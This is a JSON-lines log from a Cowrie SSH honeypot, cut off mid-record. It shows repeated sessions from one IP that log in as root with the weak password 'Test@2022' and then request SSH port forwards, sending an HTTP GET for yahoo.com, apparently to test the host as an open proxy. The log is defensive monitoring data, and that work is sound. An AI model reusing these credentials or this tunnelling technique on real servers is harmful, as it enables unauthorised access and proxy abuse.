{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18682,"dst_ip":"1.2.3.4","dst_port":22,"session":"4932d708c3b5","protocol":"ssh","message":"New connection: 213.209.150.239:18682 (1.2.3.4:22) [session: 4932d708c3b5]","sensor":"my-vps","timestamp":"2025-08-26T01:01:30.600166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:30.600996Z","src_ip":"213.209.150.239","session":"4932d708c3b5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:30.657778Z","src_ip":"213.209.150.239","session":"4932d708c3b5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:30.939595Z","src_ip":"213.209.150.239","session":"4932d708c3b5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":22702,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:22702","sensor":"my-vps","timestamp":"2025-08-26T01:01:30.997614Z","session":"4932d708c3b5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:31.054285Z","src_ip":"213.209.150.239","session":"4932d708c3b5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":2694,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2694","sensor":"my-vps","timestamp":"2025-08-26T01:01:31.210897Z","session":"4932d708c3b5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:31.267482Z","src_ip":"213.209.150.239","session":"4932d708c3b5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:31.325303Z","src_ip":"213.209.150.239","session":"4932d708c3b5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18742,"dst_ip":"1.2.3.4","dst_port":22,"session":"58f2478d4172","protocol":"ssh","message":"New connection: 213.209.150.239:18742 (1.2.3.4:22) [session: 58f2478d4172]","sensor":"my-vps","timestamp":"2025-08-26T01:01:31.381005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:31.382100Z","src_ip":"213.209.150.239","session":"58f2478d4172"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:31.438860Z","src_ip":"213.209.150.239","session":"58f2478d4172"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:31.721187Z","src_ip":"213.209.150.239","session":"58f2478d4172"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":22564,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:22564","sensor":"my-vps","timestamp":"2025-08-26T01:01:31.778775Z","session":"58f2478d4172"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:31.835402Z","src_ip":"213.209.150.239","session":"58f2478d4172"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":9311,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:9311","sensor":"my-vps","timestamp":"2025-08-26T01:01:31.990988Z","session":"58f2478d4172"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.047588Z","src_ip":"213.209.150.239","session":"58f2478d4172"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.105004Z","src_ip":"213.209.150.239","session":"58f2478d4172"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18801,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2f048eb2019","protocol":"ssh","message":"New connection: 213.209.150.239:18801 (1.2.3.4:22) [session: f2f048eb2019]","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.160758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.162080Z","src_ip":"213.209.150.239","session":"f2f048eb2019"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.218602Z","src_ip":"213.209.150.239","session":"f2f048eb2019"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.501795Z","src_ip":"213.209.150.239","session":"f2f048eb2019"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":29262,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:29262","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.559510Z","session":"f2f048eb2019"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.616441Z","src_ip":"213.209.150.239","session":"f2f048eb2019"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":21189,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:21189","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.771200Z","session":"f2f048eb2019"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.828240Z","src_ip":"213.209.150.239","session":"f2f048eb2019"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.886340Z","src_ip":"213.209.150.239","session":"f2f048eb2019"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18855,"dst_ip":"1.2.3.4","dst_port":22,"session":"56200c7ab974","protocol":"ssh","message":"New connection: 213.209.150.239:18855 (1.2.3.4:22) [session: 56200c7ab974]","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.941859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.942510Z","src_ip":"213.209.150.239","session":"56200c7ab974"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:32.999279Z","src_ip":"213.209.150.239","session":"56200c7ab974"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:33.281239Z","src_ip":"213.209.150.239","session":"56200c7ab974"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":6888,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:6888","sensor":"my-vps","timestamp":"2025-08-26T01:01:33.338721Z","session":"56200c7ab974"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:33.395361Z","src_ip":"213.209.150.239","session":"56200c7ab974"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":5211,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:5211","sensor":"my-vps","timestamp":"2025-08-26T01:01:33.551150Z","session":"56200c7ab974"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:33.607709Z","src_ip":"213.209.150.239","session":"56200c7ab974"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:33.665266Z","src_ip":"213.209.150.239","session":"56200c7ab974"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18912,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9d4117f1297","protocol":"ssh","message":"New connection: 213.209.150.239:18912 (1.2.3.4:22) [session: d9d4117f1297]","sensor":"my-vps","timestamp":"2025-08-26T01:01:33.721041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:33.722132Z","src_ip":"213.209.150.239","session":"d9d4117f1297"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:33.778874Z","src_ip":"213.209.150.239","session":"d9d4117f1297"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:34.061729Z","src_ip":"213.209.150.239","session":"d9d4117f1297"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":7114,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:7114","sensor":"my-vps","timestamp":"2025-08-26T01:01:34.120177Z","session":"d9d4117f1297"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:34.177109Z","src_ip":"213.209.150.239","session":"d9d4117f1297"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":2277,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:2277","sensor":"my-vps","timestamp":"2025-08-26T01:01:34.331244Z","session":"d9d4117f1297"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:34.388055Z","src_ip":"213.209.150.239","session":"d9d4117f1297"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:34.445765Z","src_ip":"213.209.150.239","session":"d9d4117f1297"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18959,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa61387dbc81","protocol":"ssh","message":"New connection: 213.209.150.239:18959 (1.2.3.4:22) [session: aa61387dbc81]","sensor":"my-vps","timestamp":"2025-08-26T01:01:34.491944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:34.492792Z","src_ip":"213.209.150.239","session":"aa61387dbc81"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","ae